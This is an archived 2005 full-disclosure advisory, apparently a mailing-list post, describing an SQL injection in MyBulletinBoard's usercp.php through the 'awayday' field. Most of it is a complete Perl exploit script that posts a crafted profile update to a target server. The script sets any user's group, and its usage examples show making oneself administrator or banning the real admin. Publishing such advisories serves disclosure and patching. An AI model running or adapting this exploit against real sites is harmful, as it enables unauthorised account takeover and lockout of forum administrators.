Related information

Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

File Including In PBLang

[SA17333] phpESP Unspecified Cross-Site Scripting and SQL Injection

[SA17353] gCards "limit" SQL Injection Vulnerability

[Full-disclosure] Multiple vulnerabilities within RockLiffe MailSite Express WebMail

From:	Animal <cOre_(at)_xaker.ru>
Date:	27.10.2005
Subject:	SQL-Injection in MyBulletinBoard allows attacker to become a board admin.

Vendor:  www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and mayb prior.
Script:  usercp.php
Code:
>  if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] !=  
> "no")
>        {
>     [...]
>         $returndate =  
> $mybb->input['awayday']."-".$mybb-
>input['awaymonth']."-".$mybb-
>input['awayyear'];
>     [...]
>      $newprofile = array(
>               "website" =>  
> addslashes(htmlspecialchars($mybb->input['website'])),

>               "icq" => intval($mybb->input['icq']),
>               "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
>               "yahoo" =>  
> addslashes(htmlspecialchars($mybb->input['yahoo'])),
>               "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
>               "birthday" => $bday,
>               "away" => $away,
>               "awaydate" => $awaydate,
>               "returndate" => $returndate,   // <--- not checked (bday  
> too, but anyway)
>               "awayreason" =>  
> addslashes(htmlspecialchars($mybb-
>input['awayreason']))
>               );
>     [...]
>      $db->update_query(TABLE_PREFIX."users", $newprofile,  
> "uid='".$mybb->user['uid']."'");
So: Attacker can replace "awayday" param by some SQL code and change any  
field in _users table.
    Changing "usergroup" for his "uid" to 4 makes him an admin. To use  
this bug attacker have to be
    a registered/awayting_activation user.

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<--
>--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

###   MyBB Preview Release 2 SQL-Injection PoC ExPlOiT   ###
###   ------------------------------------------------   ###
###   To use this you have to be registered member on    ###
###   a target.                                          ###
###   ------------------------------------------------   ###
###   Glossary:                                          ###
###     [MYBBUSER] - name of the field in cookie;        ###
###     [YOUR_ID]  - your uid :)                         ###
###     [ID]       - victim uid                          ###
###   Available groups:                                  ###
###     1 - Unregistered / Not Logged In                 ###
###     2 - Registered                                   ###
###     3 - Super Moderators                             ###
###     4 - Administrators                               ###
###     5 - Awayting Activation                          ###
###     6 - Moderators                                   ###
###     7 - Banned                                       ###
###   ------------------------------------------------   ###
###   Examples:                                          ###
###    1) TROUBLE --> U need an admin privileges.        ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [YOUR_ID] -g 4 server /mybb/         ###
###    2) TROUBLE --> U need to ban real admin.          ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [ID] -g 7 server /mybb/              ###

use IO::Socket;

$tmp=0;

while($tmp<@ARGV)
{
 if($ARGV[$tmp] eq "-u")
  {
   $mbuser=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-i")
  {
   $id=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-g")
  {
   $ugr=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-h")
  {
   &f_help();
  }
 $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
 &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target",  
PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid
1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&
awayreason=Hacking+The+World&awayday=1-1-
2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%
2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=U
pdate+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept:  
*/*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type:
application/x-www-form-urlencoded\nContent-Length:  
".length($str)."\n\n$str\n";
while(<$sock>)
{
 if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n  
Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
#   S  u  B  r  O  u  T  i  N  e   #
#----------------------------------#


sub f_help()
{
print q(
 Usage: mybbpr2.pl <OPTIONS> SERVER PATH
 Options:
  -u USERKEY        mybbuser field from cookie.
  -i UID            User's uid. (Change group 4 this user)
  -g GROUP          New usergroup. (1-7)
  -h                Displays this help.
  );
 exit(-1);
}
#'
sub f_die($)
{
 print "\r\nERROR: $_[0]\r\n";
 exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--
<-->--<-->--<-->--<-->--

Found: 1-3 sept 2005. Don't remember.
Updated package is available (i hope).

ByE.